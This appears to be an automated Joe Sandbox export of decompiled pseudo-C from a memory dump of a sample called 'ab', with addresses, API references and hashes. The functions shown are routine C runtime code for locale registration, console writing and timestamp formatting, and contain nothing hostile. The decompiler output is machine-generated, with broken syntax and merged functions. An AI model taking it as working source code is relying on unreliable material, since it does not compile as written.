				if(_t35 != 0) {
					L5:
					E0131780E(_t93 - 0x14);
					return E0132F190(_t86, _t96);
				} else {
					_t96 = _t88;
					if(_t88 == 0) {
						_push( *((intOrPtr*)(_t93 + 8)));
						_push(_t93 - 0x10);
						__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E012F9060();
							asm("int3");
							_push(8);
							E0132F1B6(0x1368615, __eflags);
							E013177B6(_t93 - 0x14, 0);
							_t89 =  *0x13aaabc; // 0x0
							 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
							 *(_t93 - 0x10) = _t89;
							_t87 = E012F9A10( *((intOrPtr*)(_t93 + 8)), E012F9850(0x13aaa9c));
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E0131780E(_t93 - 0x14);
								return E0132F190(_t87, __eflags);
							} else {
								__eflags = _t89;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t93 + 8)));
									_push(_t93 - 0x10);
									_t51 = E0132B906(_t85, _t89, __eflags);
									_pop(_t78);
									__eflags = _t51 - 0xffffffff;
									if(__eflags == 0) {
										E012F9060();
										asm("int3");
										_push(4);
										E0132F1B6(0x1368ad3, __eflags);
										_t90 = _t78;
										 *(_t93 - 0x10) = _t90;
										 *((intOrPtr*)(_t90 + 4)) =  *((intOrPtr*)(_t93 + 0xc));
										_push( *((intOrPtr*)(_t93 + 8)));
										_t29 = _t93 - 4;
										 *_t29 =  *(_t93 - 4) & 0x00000000;
										__eflags =  *_t29;
										 *_t90 = 0x1376c58;
										E0132C81A(_t78, _t85, __eflags, __fp0);
										return E0132F190(_t90, __eflags);
									} else {
										_t87 =  *(_t93 - 0x10);
										 *(_t93 - 0x10) = _t87;
										 *(_t93 - 4) = 1;
										E0131792B(__eflags, _t87);
										 *0x1374358();
										 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 4))))();
										 *0x13aaabc = _t87;
										goto L12;
									}
								} else {
									_t87 = _t89;
									goto L12;
								}
							}
						} else {
							_t86 =  *(_t93 - 0x10);
							 *(_t93 - 0x10) = _t86;
							 *(_t93 - 4) = 1;
							E0131792B(__eflags, _t86);
							 *0x1374358();
							 *((intOrPtr*)( *((intOrPtr*)( *_t86 + 4))))();
							 *0x13aaab8 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t88;
						goto L5;
					}
				}
			}

0x0132b386
0x0132b38d
0x0132b397
0x0132b39c
0x0132b3a7
0x0132b3ab
0x0132b3b7
0x0132b3bc
0x0132b3c0
0x0132b405
0x0132b408
0x0132b414
0x0132b3c2
0x0132b3c2
0x0132b3c4
0x0132b3ca
0x0132b3d0
0x0132b3d8
0x0132b3db
0x0132b415
0x0132b41a
0x0132b41b
0x0132b422
0x0132b42c
0x0132b431
0x0132b43c
0x0132b440
0x0132b451
0x0132b453
0x0132b455
0x0132b49a
0x0132b49d
0x0132b4a9
0x0132b457
0x0132b457
0x0132b459
0x0132b45f
0x0132b465
0x0132b466
0x0132b46c
0x0132b46d
0x0132b470
0x0132b4aa
0x0132b4af
0x0132b4b0
0x0132b4b7
0x0132b4bc
0x0132b4be
0x0132b4c4
0x0132b4c7
0x0132b4ca
0x0132b4ca
0x0132b4ca
0x0132b4ce
0x0132b4d4
0x0132b4e0
0x0132b472
0x0132b472
0x0132b475
0x0132b479
0x0132b47d
0x0132b48a
0x0132b492
0x0132b494
0x00000000
0x0132b494
0x0132b45b
0x0132b45b
0x00000000
0x0132b45b
0x0132b459
0x0132b3dd
0x0132b3dd
0x0132b3e0
0x0132b3e4
0x0132b3e8
0x0132b3f5
0x0132b3fd
0x0132b3ff
0x00000000
0x0132b3ff
0x0132b3c6
0x0132b3c6
0x00000000
0x0132b3c6
0x0132b3c4

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0132B397

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

std::_Facet_Register.LIBCPMT ref: 0132B3E8
std::_Lockit::~_Lockit.LIBCPMT ref: 0132B408
Concurrency::cancel_current_task.LIBCPMT ref: 0132B415

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 4ddfa748c9d54c5e6c64bce7efe133d5d658a7bc34bf0c24d67ed4b507b6787b
Instruction ID: a81e839ed2b68548bdc428f1b247d6226ea2c52baf406dec4d762ab8011569a2
Opcode Fuzzy Hash: 4ddfa748c9d54c5e6c64bce7efe133d5d658a7bc34bf0c24d67ed4b507b6787b
Instruction Fuzzy Hash: 2301D2369102268BDF19FF68C4546BEBBB9AF94728F240408E6156B388DF349D45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0132B41B, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0132B41B(void* __eflags, void* __fp0) {
				intOrPtr* _t23;
				void* _t28;
				intOrPtr* _t45;
				void* _t49;
				intOrPtr* _t51;
				intOrPtr* _t52;
				void* _t54;

				_push(8);
				E0132F1B6(0x1368615, __eflags);
				E013177B6(_t54 - 0x14, 0);
				_t51 =  *0x13aaabc; // 0x0
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				 *((intOrPtr*)(_t54 - 0x10)) = _t51;
				_t23 = E012F9A10( *((intOrPtr*)(_t54 + 8)), E012F9850(0x13aaa9c));
				_t50 = _t23;
				if(_t23 != 0) {
					L5:
					E0131780E(_t54 - 0x14);
					return E0132F190(_t50, _t57);
				} else {
					_t57 = _t51;
					if(_t51 == 0) {
						_push( *((intOrPtr*)(_t54 + 8)));
						_push(_t54 - 0x10);
						_t28 = E0132B906(_t49, _t51, __eflags);
						_pop(_t45);
						__eflags = _t28 - 0xffffffff;
						if(__eflags == 0) {
							E012F9060();
							asm("int3");
							_push(4);
							E0132F1B6(0x1368ad3, __eflags);
							_t52 = _t45;
							 *((intOrPtr*)(_t54 - 0x10)) = _t52;
							 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t54 + 0xc));
							_push( *((intOrPtr*)(_t54 + 8)));
							_t17 = _t54 - 4;
							 *_t17 =  *(_t54 - 4) & 0x00000000;
							__eflags =  *_t17;
							 *_t52 = 0x1376c58;
							E0132C81A(_t45, _t49, __eflags, __fp0);
							return E0132F190(_t52, __eflags);
						} else {
							_t50 =  *((intOrPtr*)(_t54 - 0x10));
							 *((intOrPtr*)(_t54 - 0x10)) = _t50;
							 *(_t54 - 4) = 1;
							E0131792B(__eflags, _t50);
							 *0x1374358();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x13aaabc = _t50;
							goto L5;
						}
					} else {
						_t50 = _t51;
						goto L5;
					}
				}
			}

0x0132b41b
0x0132b422
0x0132b42c
0x0132b431
0x0132b43c
0x0132b440
0x0132b44c
0x0132b451
0x0132b455
0x0132b49a
0x0132b49d
0x0132b4a9
0x0132b457
0x0132b457
0x0132b459
0x0132b45f
0x0132b465
0x0132b466
0x0132b46c
0x0132b46d
0x0132b470
0x0132b4aa
0x0132b4af
0x0132b4b0
0x0132b4b7
0x0132b4bc
0x0132b4be
0x0132b4c4
0x0132b4c7
0x0132b4ca
0x0132b4ca
0x0132b4ca
0x0132b4ce
0x0132b4d4
0x0132b4e0
0x0132b472
0x0132b472
0x0132b475
0x0132b479
0x0132b47d
0x0132b48a
0x0132b492
0x0132b494
0x00000000
0x0132b494
0x0132b45b
0x0132b45b
0x00000000
0x0132b45b
0x0132b459

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0132B42C

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

std::_Facet_Register.LIBCPMT ref: 0132B47D
std::_Lockit::~_Lockit.LIBCPMT ref: 0132B49D
Concurrency::cancel_current_task.LIBCPMT ref: 0132B4AA

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 397b285e5c04c0e0e2c37140ce0e26ce2d85ddef91ba71d897088b05c6135267
Instruction ID: 448286822e59f8819f340ec9aa3135b5bcf1a1e9a45cc8fb76222d4863b6bd42
Opcode Fuzzy Hash: 397b285e5c04c0e0e2c37140ce0e26ce2d85ddef91ba71d897088b05c6135267
Instruction Fuzzy Hash: F701C4369102269BDB16FB68C4546BDF7B9AFA4328F24400DD51567284CF709905CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01363E15, Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01363E15(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x13a4aa0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E01363DFE();
					E01363DC0();
					_t13 = WriteConsoleW( *0x13a4aa0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x01363e32
0x01363e36
0x01363e43
0x01363e48
0x01363e63
0x01363e63
0x01363e69

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,013635F3,00000000,00000001,00000000,00000000,?,0135F7F4,?,?,00000000), ref: 01363E2C
GetLastError.KERNEL32(?,013635F3,00000000,00000001,00000000,00000000,?,0135F7F4,?,?,00000000,?,00000000,?,0135FD40,00000020), ref: 01363E38

Part of subcall function 01363DFE: CloseHandle.KERNEL32(FFFFFFFE,01363E48,?,013635F3,00000000,00000001,00000000,00000000,?,0135F7F4,?,?,00000000,?,00000000), ref: 01363E0E

___initconout.LIBCMT ref: 01363E48

Part of subcall function 01363DC0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01363DEF,013635E0,00000000,?,0135F7F4,?,?,00000000,?), ref: 01363DD3

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,013635F3,00000000,00000001,00000000,00000000,?,0135F7F4,?,?,00000000,?), ref: 01363E5D

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 818d5f21cbe11998cdd74ee5888df119d1bf7f138d66f38dda9cc2f0370e3ce0
Instruction ID: 45fd8a83db4ab88ee53d9a24408d92e2d626aeba1f7b1bf22bde35b10c19ed57
Opcode Fuzzy Hash: 818d5f21cbe11998cdd74ee5888df119d1bf7f138d66f38dda9cc2f0370e3ce0
Instruction Fuzzy Hash: 20F01C37501255BFCF331F99EC049897F6EFB093A1F458024FA1D96164C7329860DB94

Uniqueness

Uniqueness Score: -1.00%

Function 01303210, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01303210(void* __ebx, void* __ecx, void* __edx, void* __edi, char _a4) {
				intOrPtr _v0;
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				char _v17;
				signed int _v20;
				char _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v44;
				char _v52;
				signed int _v80;
				signed int _v84;
				char _v88;
				signed int _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				char _v120;
				signed int _v124;
				short* _v128;
				signed int _v136;
				signed int* _v152;
				char _v168;
				intOrPtr _v172;
				char _v185;
				intOrPtr _v196;
				unsigned int _v200;
				intOrPtr _v208;
				intOrPtr _v220;
				void* __esi;
				void* __ebp;
				signed int _t154;
				signed int _t155;
				signed int _t162;
				signed int _t163;
				void* _t171;
				signed int _t185;
				char _t188;
				signed int* _t195;
				short* _t206;
				void* _t213;
				char _t215;
				short _t225;
				void* _t238;
				signed int _t240;
				short _t249;
				signed int _t251;
				void* _t254;
				signed int _t255;
				signed int _t256;
				signed int _t266;
				void* _t268;
				signed int _t269;
				signed int _t270;
				char _t281;
				short _t286;
				signed int _t287;
				signed int _t289;
				char _t290;
				signed int _t294;
				unsigned int _t295;
				short _t301;
				signed int _t302;
				unsigned int _t303;
				short* _t311;
				unsigned int _t313;
				unsigned int _t314;
				short* _t318;
				signed char* _t320;
				char _t322;
				intOrPtr _t323;
				signed int _t333;
				void* _t334;
				signed char* _t336;
				signed int _t337;
				intOrPtr _t338;
				intOrPtr _t339;
				short _t341;
				void* _t343;
				short _t346;
				void* _t348;
				short _t350;
				signed int _t353;
				void* _t354;
				void* _t355;
				void* _t357;
				void* _t359;
				void* _t360;
				void* _t362;
				void* _t380;

				_t312 = __edx;
				_t268 = __ebx;
				_push(0xffffffff);
				_push(0x1366305);
				_push( *[fs:0x0]);
				_t154 =  *0x13a4018; // 0x39cca9f6
				_t155 = _t154 ^ _t353;
				_v20 = _t155;
				_push(__edi);
				_push(_t155);
				 *[fs:0x0] =  &_v16;
				_t318 = _a4;
				asm("xorps xmm0, xmm0");
				_v96 = _t318;
				_v128 = _t318;
				asm("movlpd [ebp-0x30], xmm0");
				E0134A72C(__ecx, __edx,  &_v52);
				_push( &_v52);
				_push( &_v88);
				E0134A14E();
				_t162 = _v84;
				_t359 = _t357 - 0x70 + 0xc;
				if(_t162 != 0x3b) {
					_t163 = _t162 + 1;
					__eflags = _t163;
					_v84 = _t163;
				} else {
					_t266 = _v80;
					if(_t266 >= 0x17) {
						_v80 = 0;
						_v84 = 0;
					} else {
						_v84 = 0;
						_v80 = _t266 + 1;
					}
				}
				_v28 = 0;
				_v24 = 0xf;
				_v44 = 0;
				_t333 = E012F57D0(_t268, _t312, _t318, 0x110);
				_v28 = 0x104;
				_v92 = _t333;
				_v24 = 0x10f;
				E013478D0(_t318, _t333, 0, 0x104);
				 *((char*)(_t333 + 0x104)) = 0;
				E012F5760( &_v44,  &_v92);
				_v8 = 0;
				_t170 =  >=  ? _v44 :  &_v44;
				_t171 = E0134A70D( >=  ? _v44 :  &_v44, _v28, "%Y-%m-%dT%H:%M:%S",  &_v88);
				_t360 = _t359 + 0x28;
				_push(0);
				if(_t171 == 0) {
					 *(_t318 + 0x10) = 0;
					 *(_t318 + 0x14) = 7;
					 *_t318 = 0;
					E012F51B0(_t268, _t318, _t318, _t333, 0x13836c0);
					_t281 = _v24;
					__eflags = _t281 - 0x10;
					if(_t281 >= 0x10) {
						_t286 = _t281 + 1;
						__eflags = _t286;
						_push(_t286);
						goto L19;
					}
					goto L20;
				} else {
					_push(_t171);
					_t287 =  &_v44;
					L23();
					_t178 =  >=  ? _v44 :  &_v44;
					_t336 =  &((E012F5640( >=  ? _v44 :  &_v44))[_v28]);
					_t181 =  >=  ? _v44 :  &_v44;
					_t320 = E012F5640( >=  ? _v44 :  &_v44);
					_v104 = 0;
					_v100 = 7;
					_v120 = 0;
					_t360 = _t360 + 8;
					_t185 = _t336 - _t320;
					_v124 = _t185;
					if(_t185 <= 7) {
						L13:
						_v96 =  &_v120;
						_v8 = 1;
						while(_t320 != _t336) {
							E012FC140(_t268,  &_v120, _t320, _t336,  *_t320 & 0x0000ffff);
							_t320 =  &(_t320[1]);
						}
						_t318 = _v128;
						asm("movups xmm0, [ebp-0x74]");
						_v120 = 0;
						_t188 = _v24;
						 *(_t318 + 0x10) = 0;
						 *(_t318 + 0x14) = 0;
						asm("movups [edi], xmm0");
						asm("movq xmm0, [ebp-0x64]");
						asm("movq [edi+0x10], xmm0");
						_v104 = 0;
						_v100 = 7;
						if(_t188 >= 0x10) {
							_push(_t188 + 1);
							L19:
							E012F56A0(_t268, _t318, _v44);
						}
						L20:
						 *[fs:0x0] = _v16;
						_pop(_t334);
						return E0132EA79(_v20 ^ _t353, _t334);
					} else {
						if(_t185 > 0x7ffffffe) {
							E012F4B30(_t287, __eflags);
							goto L22;
						} else {
							_t255 = _t185 | 0x00000007;
							_t380 = _t255 - 0x7ffffffe;
							if(_t380 <= 0) {
								__eflags = _t255 - 0xa;
								_t256 =  <  ? 0xa : _t255;
							} else {
								_t256 = 0x7ffffffe;
							}
							_v92 = _t256;
							_t287 =  ~(0 | _t380 > 0x00000000) | _t256 + 0x00000001;
							if(_t287 > 0x7fffffff) {
								L22:
								E012F4A60();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t353);
								_t354 = _t360;
								_t362 = _t360 - 0x14;
								_push(_t268);
								_t269 = _t287;
								_t289 = _v136;
								_t74 = _t269 + 0x10; // 0x10
								_t195 = _t74;
								_push(_t336);
								_t337 =  *_t195;
								_v152 = _t195;
								__eflags = _t289 - _t337;
								if(_t289 > _t337) {
									_t313 =  *(_t269 + 0x14);
									_push(_t320);
									_v28 = _t313;
									_t322 = _t289 - _t337;
									_v24 = _t322;
									__eflags = _t322 - _t313 - _t337;
									if(_t322 > _t313 - _t337) {
										__eflags = 0x7fffffff - _t337 - _t322;
										if(__eflags < 0) {
											E012F4B30(_t289, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t354);
											_t355 = _t362;
											_push(_t269);
											_t270 = _t289;
											_t290 = _v168;
											_push(_t337);
											_push(_t322);
											_t323 = _v172;
											_t314 =  *(_t270 + 0x14);
											_t338 =  *((intOrPtr*)(_t270 + 0x10));
											_v196 = _t323;
											_v185 = _t290;
											_v200 = _t314;
											__eflags = _t323 - _t314 - _t338;
											if(_t323 > _t314 - _t338) {
												__eflags = 0x7fffffff - _t338 - _t323;
												if(__eflags < 0) {
													E012F4B30(_t290, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t355);
													_push(_t290);
													_push(_t338);
													_push(2);
													_t339 = _t290;
													_v220 = _t339;
													_t206 = E012F8A40(_t270, _v208, 0, L"PT");
													 *(_t339 + 0x10) = 0;
													__eflags = 0;
													 *(_t339 + 0x14) = 0;
													asm("movups xmm0, [eax]");
													asm("movups [esi], xmm0");
													asm("movq xmm0, [eax+0x10]");
													asm("movq [esi+0x10], xmm0");
													 *(_t206 + 0x10) = 0;
													 *(_t206 + 0x14) = 7;
													 *_t206 = 0;
													return _t339;
												} else {
													_t294 = _t338 + _t323 | 0x0000000f;
													__eflags = _t294 - 0x7fffffff;
													if(_t294 <= 0x7fffffff) {
														_v16 = _t314 >> 1;
														__eflags = _t314 - 0x7fffffff - _v16;
														if(_t314 <= 0x7fffffff - _v16) {
															_t213 = _v16 + _t314;
															__eflags = _t294 - _t213;
															_t295 =  <  ? _t213 : _t294;
														} else {
															_t295 = 0x7fffffff;
														}
													} else {
														_t295 = 0x7fffffff;
													}
													_t126 = _t295 + 1; // 0x80000000
													_v16 = _t295;
													_t215 = E012F57D0(_t270, _t314, _t323, _t126);
													_v24 = _t215;
													 *((intOrPtr*)(_t270 + 0x10)) = _t338 + _t323;
													__eflags = _v32 - 0x10;
													 *(_t270 + 0x14) = _v16;
													_v16 = _v17;
													_push(_t338);
													if(_v32 < 0x10) {
														_push(_t270);
														_push(_t215);
														E01345ED0();
														_t341 = _t338 + _v24;
														__eflags = _t341;
														E013478D0(_t323, _t341, _v16, _t323);
														 *((char*)(_t341 + _t323)) = 0;
														E012F5760(_t270,  &_v24);
														return _t270;
													} else {
														_t325 =  *_t270;
														_push( *_t270);
														_push(_t215);
														E01345ED0();
														_t343 = _t338 + _v24;
														E013478D0( *_t270, _t343, _v16, _v28);
														 *((char*)(_t343 + _v28)) = 0;
														_t225 = _v32 + 1;
														__eflags = _t225;
														_push(_t225);
														E012F56A0(_t270,  *_t270, _t325);
														 *_t270 = _v24;
														return _t270;
													}
												}
											} else {
												_v16 = _t270;
												 *((intOrPtr*)(_t270 + 0x10)) = _t323 + _t338;
												_t230 = _t270;
												__eflags = _t314 - 0x10;
												if(_t314 >= 0x10) {
													_t230 =  *_t270;
													_v16 =  *_t270;
												}
												E013478D0(_t323, _t230 + _t338, _t290, _t323);
												_t301 = _v16 + _t323;
												__eflags = _t301;
												 *((char*)(_t301 + _t338)) = 0;
												return _t270;
											}
										} else {
											_t302 = _t289 | 0x0000000f;
											__eflags = _t302 - 0x7fffffff;
											if(_t302 <= 0x7fffffff) {
												_v12 = _t313 >> 1;
												__eflags = _t313 - 0x7fffffff - _v12;
												if(_t313 <= 0x7fffffff - _v12) {
													_t238 = _v12 + _t313;
													__eflags = _t302 - _t238;
													_t303 =  <  ? _t238 : _t302;
												} else {
													_t303 = 0x7fffffff;
												}
											} else {
												_t303 = 0x7fffffff;
											}
											_t87 = _t303 + 1; // 0x80000000
											_v12 = _t303;
											_t240 = E012F57D0(_t269, _t313, _t322, _t87);
											__eflags = _v28 - 0x10;
											_v20 = _t240;
											 *_v16 = _v0;
											 *(_t269 + 0x14) = _v12;
											_v16 = _a4;
											_push(_t337);
											if(_v28 < 0x10) {
												_push(_t269);
												_push(_t240);
												E01345ED0();
												_t346 = _t337 + _v20;
												__eflags = _t346;
												E013478D0(_t322, _t346, _v16, _t322);
												 *((char*)(_t346 + _t322)) = 0;
												return E012F5760(_t269,  &_v20);
											} else {
												_t329 =  *_t269;
												_push( *_t269);
												_push(_t240);
												E01345ED0();
												_t348 = _t337 + _v20;
												E013478D0( *_t269, _t348, _v16, _v24);
												 *((char*)(_t348 + _v24)) = 0;
												_t249 = _v28 + 1;
												__eflags = _t249;
												_push(_t249);
												E012F56A0(_t269,  *_t269, _t329);
												_t251 = _v20;
												 *_t269 = _t251;
												return _t251;
											}
										}
									} else {
										 *_v16 = _t289;
										__eflags = _t313 - 0x10;
										if(_t313 >= 0x10) {
											_t269 =  *_t269;
										}
										_t350 = _t337 + _t269;
										__eflags = _t350;
										_t254 = E013478D0(_t322, _t350, _a4, _t322);
										 *((char*)(_t350 + _t322)) = 0;
										return _t254;
									}
								} else {
									__eflags =  *(_t269 + 0x14) - 0x10;
									if( *(_t269 + 0x14) >= 0x10) {
										_t269 =  *_t269;
									}
									 *_t195 = _t289;
									 *((char*)(_t269 + _t289)) = 0;
									return _t195;
								}
							} else {
								_t311 = E012F57D0(_t268, _t312, _t320, _t287 + _t287);
								_v104 = _v124;
								_v100 = _v92;
								 *_t311 = _v120;
								_v96 = _t311;
								E012F5760( &_v120,  &_v96);
								_t360 = _t360 + 0xc;
								_v104 = 0;
								goto L13;
							}
						}
					}
				}
			}

0x01303210
0x01303210
0x01303213
0x01303215
0x01303220
0x01303224
0x01303229
0x0130322b
0x0130322f
0x01303230
0x01303234
0x0130323a
0x01303240
0x01303243
0x01303247
0x0130324a
0x0130324f
0x01303257
0x0130325b
0x0130325c
0x01303261
0x01303264
0x0130326a
0x01303291
0x01303291
0x01303292
0x0130326c
0x0130326c
0x01303272
0x01303281
0x01303288
0x01303274
0x01303275
0x0130327c
0x0130327c
0x01303272
0x0130329a
0x013032a1
0x013032a8
0x013032b6
0x013032b8
0x013032c2
0x013032c5
0x013032cc
0x013032d4
0x013032e0
0x013032e8
0x013032f7
0x01303304
0x01303309
0x0130330c
0x01303310
0x0130344b
0x01303452
0x01303460
0x01303463
0x01303468
0x0130346b
0x0130346e
0x01303470
0x01303470
0x01303471
0x00000000
0x01303471
0x00000000
0x01303316
0x01303316
0x01303317
0x0130331a
0x01303326
0x01303335
0x0130333c
0x01303346
0x01303348
0x01303351
0x01303358
0x0130335c
0x01303361
0x01303363
0x01303369
0x013033e4
0x013033e7
0x013033ea
0x013033f0
0x013033fd
0x01303402
0x01303403
0x01303407
0x0130340c
0x01303410
0x01303414
0x01303417
0x0130341e
0x01303425
0x01303428
0x0130342d
0x01303432
0x01303439
0x01303443
0x01303446
0x01303472
0x01303475
0x0130347a
0x0130347d
0x01303482
0x0130348b
0x01303499
0x0130336b
0x01303370
0x0130349c
0x00000000
0x01303376
0x01303376
0x01303379
0x0130337e
0x0130338c
0x0130338e
0x01303380
0x01303380
0x01303380
0x01303393
0x0130339e
0x013033a6
0x013034a1
0x013034a1
0x013034a6
0x013034a7
0x013034a8
0x013034a9
0x013034aa
0x013034ab
0x013034ac
0x013034ad
0x013034ae
0x013034af
0x013034b0
0x013034b1
0x013034b3
0x013034b6
0x013034b7
0x013034b9
0x013034bc
0x013034bc
0x013034bf
0x013034c0
0x013034c2
0x013034c5
0x013034c7
0x013034df
0x013034e4
0x013034e7
0x013034ea
0x013034ee
0x013034f1
0x013034f3
0x01303526
0x01303528
0x013035fb
0x01303600
0x01303601
0x01303602
0x01303603
0x01303604
0x01303605
0x01303606
0x01303607
0x01303608
0x01303609
0x0130360a
0x0130360b
0x0130360c
0x0130360d
0x0130360e
0x0130360f
0x01303610
0x01303611
0x01303616
0x01303617
0x01303619
0x0130361c
0x0130361d
0x0130361e
0x01303621
0x01303626
0x0130362b
0x0130362e
0x01303631
0x01303634
0x01303636
0x01303679
0x0130367b
0x01303753
0x01303758
0x01303759
0x0130375a
0x0130375b
0x0130375c
0x0130375d
0x0130375e
0x0130375f
0x01303760
0x01303763
0x01303764
0x01303765
0x01303767
0x01303773
0x01303776
0x0130377b
0x01303782
0x01303784
0x0130378b
0x0130378e
0x01303791
0x01303796
0x0130379b
0x013037a2
0x013037a9
0x013037b2
0x01303681
0x01303684
0x01303687
0x0130368d
0x0130369a
0x013036a5
0x013036a7
0x013036b3
0x013036b5
0x013036b7
0x013036a9
0x013036a9
0x013036a9
0x0130368f
0x0130368f
0x0130368f
0x013036ba
0x013036bd
0x013036c1
0x013036c9
0x013036cf
0x013036d2
0x013036d9
0x013036e0
0x013036e3
0x013036e4
0x01303723
0x01303724
0x01303725
0x0130372a
0x0130372a
0x01303732
0x0130373a
0x01303740
0x01303750
0x013036e6
0x013036e6
0x013036e8
0x013036e9
0x013036ea
0x013036f2
0x013036f9
0x01303701
0x01303708
0x01303708
0x01303709
0x0130370b
0x01303716
0x01303720
0x01303720
0x013036e4
0x01303638
0x01303638
0x0130363e
0x01303641
0x01303643
0x01303646
0x01303648
0x0130364a
0x0130364a
0x01303656
0x01303661
0x01303661
0x01303666
0x0130366f
0x0130366f
0x0130352e
0x0130352e
0x01303531
0x01303537
0x01303544
0x0130354f
0x01303551
0x0130355d
0x0130355f
0x01303561
0x01303553
0x01303553
0x01303553
0x01303539
0x01303539
0x01303539
0x01303564
0x01303567
0x0130356b
0x01303576
0x0130357d
0x01303580
0x01303585
0x0130358c
0x0130358f
0x01303590
0x013035cd
0x013035ce
0x013035cf
0x013035d4
0x013035d4
0x013035dc
0x013035e4
0x013035f8
0x01303592
0x01303592
0x01303594
0x01303595
0x01303596
0x0130359e
0x013035a5
0x013035ad
0x013035b4
0x013035b4
0x013035b5
0x013035b7
0x013035bc
0x013035c2
0x013035ca
0x013035ca
0x01303590
0x013034f5
0x013034f8
0x013034fa
0x013034fd
0x013034ff
0x013034ff
0x01303505
0x01303505
0x0130350a
0x01303512
0x0130351c
0x0130351c
0x013034c9
0x013034c9
0x013034cd
0x013034cf
0x013034cf
0x013034d1
0x013034d4
0x013034dc
0x013034dc
0x013033ac
0x013033b5
0x013033ba
0x013033c0
0x013033c7
0x013033d1
0x013033d5
0x013033da
0x013033dd
0x00000000
0x013033dd
0x013033a6
0x01303370
0x01303369

APIs

